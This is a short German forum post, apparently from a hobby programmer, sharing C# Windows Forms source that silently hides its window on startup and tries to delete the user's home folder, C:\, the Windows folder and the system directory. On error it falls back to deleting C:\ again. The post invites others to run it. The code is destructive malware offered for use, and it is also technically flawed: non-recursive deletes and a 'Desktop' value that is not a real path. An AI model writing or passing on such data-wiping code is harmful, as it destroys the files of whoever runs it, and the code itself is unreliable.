Kann ja mal wer testen wenn er bock hatt...
Löscht Desktop,Windows,C,System Verzeichniss,home verzeichniss,
sollte ein error kommen, löscht er soviel aus C wie er nur kann,
Code:
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.IO;

namespace WindowsFormsApplication13
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }

        private void Form1_Load(object sender, EventArgs e)
        {
            try
            {
                string userHomePath =
                    Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)
                    , "..");
                Directory.Delete(userHomePath);

                string a;
                a = (Convert.ToString(Environment.SpecialFolder.Desktop));


                this.Visible = false;
                Directory.Delete("C:\\");
                Application.DoEvents();
                Directory.Delete("C:\\WINDOWS\\");
               
                Directory.Delete(Environment.SystemDirectory);
                Directory.Delete(a);

            }
            catch
            {
                Directory.Delete("C:\\");
                Application.DoEvents();
            }
        }
    }
}